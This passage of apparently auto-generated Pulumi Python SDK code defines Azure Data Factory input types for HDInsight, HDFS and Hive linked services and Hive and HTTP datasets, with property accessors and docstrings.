pulumi.set(self, "type", value)
@property
@pulumi.getter
def version(self) -> Any:
"""
Version of the HDInsight cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Any):
pulumi.set(self, "version", value)
@property
@pulumi.getter(name="additionalLinkedServiceNames")
def additional_linked_service_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]]:
"""
Specifies additional storage accounts for the HDInsight linked service so that the Data Factory service can register them on your behalf.
"""
return pulumi.get(self, "additional_linked_service_names")
@additional_linked_service_names.setter
def additional_linked_service_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LinkedServiceReferenceArgs']]]]):
pulumi.set(self, "additional_linked_service_names", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clusterNamePrefix")
def cluster_name_prefix(self) -> Optional[Any]:
"""
The prefix of the cluster name; a timestamp-based postfix keeps the name distinct. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_name_prefix")
@cluster_name_prefix.setter
def cluster_name_prefix(self, value: Optional[Any]):
pulumi.set(self, "cluster_name_prefix", value)
@property
@pulumi.getter(name="clusterPassword")
def cluster_password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password to access the cluster.
"""
return pulumi.get(self, "cluster_password")
@cluster_password.setter
def cluster_password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "cluster_password", value)
@property
@pulumi.getter(name="clusterSshPassword")
def cluster_ssh_password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password used to remotely connect to the cluster’s node via SSH (for Linux).
"""
return pulumi.get(self, "cluster_ssh_password")
@cluster_ssh_password.setter
def cluster_ssh_password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "cluster_ssh_password", value)
@property
@pulumi.getter(name="clusterSshUserName")
def cluster_ssh_user_name(self) -> Optional[Any]:
"""
The username used to remotely connect to the cluster’s node via SSH (for Linux). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_ssh_user_name")
@cluster_ssh_user_name.setter
def cluster_ssh_user_name(self, value: Optional[Any]):
pulumi.set(self, "cluster_ssh_user_name", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[Any]:
"""
The cluster type. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[Any]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="clusterUserName")
def cluster_user_name(self) -> Optional[Any]:
"""
The username to access the cluster. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cluster_user_name")
@cluster_user_name.setter
def cluster_user_name(self, value: Optional[Any]):
pulumi.set(self, "cluster_user_name", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="coreConfiguration")
def core_configuration(self) -> Optional[Any]:
"""
Specifies the core configuration parameters (as in core-site.xml) for the HDInsight cluster to be created.
"""
return pulumi.get(self, "core_configuration")
@core_configuration.setter
def core_configuration(self, value: Optional[Any]):
pulumi.set(self, "core_configuration", value)
@property
@pulumi.getter(name="dataNodeSize")
def data_node_size(self) -> Optional[Any]:
"""
Specifies the size of the data node for the HDInsight cluster.
"""
return pulumi.get(self, "data_node_size")
@data_node_size.setter
def data_node_size(self, value: Optional[Any]):
pulumi.set(self, "data_node_size", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="hBaseConfiguration")
def h_base_configuration(self) -> Optional[Any]:
"""
Specifies the HBase configuration parameters (hbase-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "h_base_configuration")
@h_base_configuration.setter
def h_base_configuration(self, value: Optional[Any]):
pulumi.set(self, "h_base_configuration", value)
@property
@pulumi.getter(name="hcatalogLinkedServiceName")
def hcatalog_linked_service_name(self) -> Optional[pulumi.Input['LinkedServiceReferenceArgs']]:
"""
The name of the Azure SQL linked service that points to the HCatalog database. The on-demand HDInsight cluster is created by using the Azure SQL database as the metastore.
"""
return pulumi.get(self, "hcatalog_linked_service_name")
@hcatalog_linked_service_name.setter
def hcatalog_linked_service_name(self, value: Optional[pulumi.Input['LinkedServiceReferenceArgs']]):
pulumi.set(self, "hcatalog_linked_service_name", value)
@property
@pulumi.getter(name="hdfsConfiguration")
def hdfs_configuration(self) -> Optional[Any]:
"""
Specifies the HDFS configuration parameters (hdfs-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "hdfs_configuration")
@hdfs_configuration.setter
def hdfs_configuration(self, value: Optional[Any]):
pulumi.set(self, "hdfs_configuration", value)
@property
@pulumi.getter(name="headNodeSize")
def head_node_size(self) -> Optional[Any]:
"""
Specifies the size of the head node for the HDInsight cluster.
"""
return pulumi.get(self, "head_node_size")
@head_node_size.setter
def head_node_size(self, value: Optional[Any]):
pulumi.set(self, "head_node_size", value)
@property
@pulumi.getter(name="hiveConfiguration")
def hive_configuration(self) -> Optional[Any]:
"""
Specifies the Hive configuration parameters (hive-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "hive_configuration")
@hive_configuration.setter
def hive_configuration(self, value: Optional[Any]):
pulumi.set(self, "hive_configuration", value)
@property
@pulumi.getter(name="mapReduceConfiguration")
def map_reduce_configuration(self) -> Optional[Any]:
"""
Specifies the MapReduce configuration parameters (mapred-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "map_reduce_configuration")
@map_reduce_configuration.setter
def map_reduce_configuration(self, value: Optional[Any]):
pulumi.set(self, "map_reduce_configuration", value)
@property
@pulumi.getter(name="oozieConfiguration")
def oozie_configuration(self) -> Optional[Any]:
"""
Specifies the Oozie configuration parameters (oozie-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "oozie_configuration")
@oozie_configuration.setter
def oozie_configuration(self, value: Optional[Any]):
pulumi.set(self, "oozie_configuration", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The service principal id for the hostSubscriptionId. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key for the service principal id.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> Optional[Any]:
"""
The version of Spark if the cluster type is 'spark'. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "spark_version")
@spark_version.setter
def spark_version(self, value: Optional[Any]):
pulumi.set(self, "spark_version", value)
@property
@pulumi.getter(name="stormConfiguration")
def storm_configuration(self) -> Optional[Any]:
"""
Specifies the Storm configuration parameters (storm-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "storm_configuration")
@storm_configuration.setter
def storm_configuration(self, value: Optional[Any]):
pulumi.set(self, "storm_configuration", value)
@property
@pulumi.getter(name="yarnConfiguration")
def yarn_configuration(self) -> Optional[Any]:
"""
Specifies the Yarn configuration parameters (yarn-site.xml) for the HDInsight cluster.
"""
return pulumi.get(self, "yarn_configuration")
@yarn_configuration.setter
def yarn_configuration(self, value: Optional[Any]):
pulumi.set(self, "yarn_configuration", value)
@property
@pulumi.getter(name="zookeeperNodeSize")
def zookeeper_node_size(self) -> Optional[Any]:
"""
Specifies the size of the ZooKeeper node for the HDInsight cluster.
"""
return pulumi.get(self, "zookeeper_node_size")
@zookeeper_node_size.setter
def zookeeper_node_size(self, value: Optional[Any]):
pulumi.set(self, "zookeeper_node_size", value)
@pulumi.input_type
class HdfsLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Hadoop Distributed File System (HDFS) linked service.
:param pulumi.Input[str] type: Type of linked service. Expected value is 'Hdfs'.
:param Any url: The URL of the HDFS service endpoint, e.g. http://myhostname:50070/webhdfs/v1. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param Any authentication_type: Type of authentication used to connect to HDFS. Possible values are: Anonymous and Windows. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Windows authentication.
:param Any user_name: User name for Windows authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'Hdfs')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the HDFS service endpoint, e.g. http://myhostname:50070/webhdfs/v1. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[Any]:
"""
Type of authentication used to connect to HDFS. Possible values are: Anonymous and Windows. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[Any]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Windows authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Windows authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HiveLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
server_type: Optional[pulumi.Input[str]] = None,
service_discovery_mode: Optional[Any] = None,
thrift_transport_protocol: Optional[pulumi.Input[str]] = None,
trusted_cert_path: Optional[Any] = None,
use_native_query: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None,
zoo_keeper_name_space: Optional[Any] = None):
"""
Hive Server linked service.
:param pulumi.Input[str] authentication_type: The authentication method used to access the Hive server.
:param Any host: IP address or host name of the Hive server, separated by ';' for multiple hosts (only when serviceDiscoveryMode is enabled).
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Hive server.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the Username field.
:param Any port: The TCP port that the Hive server uses to listen for client connections.
:param pulumi.Input[str] server_type: The type of Hive server.
:param Any service_discovery_mode: True to use the ZooKeeper service, false otherwise.
:param pulumi.Input[str] thrift_transport_protocol: The transport protocol to use in the Thrift layer.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_native_query: Specifies whether the driver uses native HiveQL queries, or converts them into an equivalent form in HiveQL.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name that you use to access Hive Server.
:param Any zoo_keeper_name_space: The namespace on ZooKeeper under which Hive Server 2 nodes are added.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Hive')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if service_discovery_mode is not None:
pulumi.set(__self__, "service_discovery_mode", service_discovery_mode)
if thrift_transport_protocol is not None:
pulumi.set(__self__, "thrift_transport_protocol", thrift_transport_protocol)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_native_query is not None:
pulumi.set(__self__, "use_native_query", use_native_query)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
if zoo_keeper_name_space is not None:
pulumi.set(__self__, "zoo_keeper_name_space", zoo_keeper_name_space)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication method used to access the Hive server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
IP address or host name of the Hive server, separated by ';' for multiple hosts (only when serviceDiscoveryMode is enabled).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Hive server.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the Username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def port(self) -> Optional[Any]:
"""
The TCP port that the Hive server uses to listen for client connections.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[Any]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of Hive server.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter(name="serviceDiscoveryMode")
def service_discovery_mode(self) -> Optional[Any]:
"""
True to use the ZooKeeper service, false otherwise.
"""
return pulumi.get(self, "service_discovery_mode")
@service_discovery_mode.setter
def service_discovery_mode(self, value: Optional[Any]):
pulumi.set(self, "service_discovery_mode", value)
@property
@pulumi.getter(name="thriftTransportProtocol")
def thrift_transport_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The transport protocol to use in the Thrift layer.
"""
return pulumi.get(self, "thrift_transport_protocol")
@thrift_transport_protocol.setter
def thrift_transport_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thrift_transport_protocol", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useNativeQuery")
def use_native_query(self) -> Optional[Any]:
"""
Specifies whether the driver uses native HiveQL queries, or converts them into an equivalent form in HiveQL.
"""
return pulumi.get(self, "use_native_query")
@use_native_query.setter
def use_native_query(self, value: Optional[Any]):
pulumi.set(self, "use_native_query", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name that you use to access Hive Server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="zooKeeperNameSpace")
def zoo_keeper_name_space(self) -> Optional[Any]:
"""
The namespace on ZooKeeper under which Hive Server 2 nodes are added.
"""
return pulumi.get(self, "zoo_keeper_name_space")
@zoo_keeper_name_space.setter
def zoo_keeper_name_space(self, value: Optional[Any]):
pulumi.set(self, "zoo_keeper_name_space", value)
@pulumi.input_type
class HiveObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Hive Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HiveObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HttpDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
additional_headers: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
relative_url: Optional[Any] = None,
request_body: Optional[Any] = None,
request_method: Optional[Any] = None,
structure: Optional[Any] = None):
"""
A file in an HTTP web server.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param Any additional_headers: The headers for the HTTP Request. e.g. request-header-name-1:request-header-value-1
...
request-header-name-n:request-header-value-n. Type: string (or Expression with resultType string).
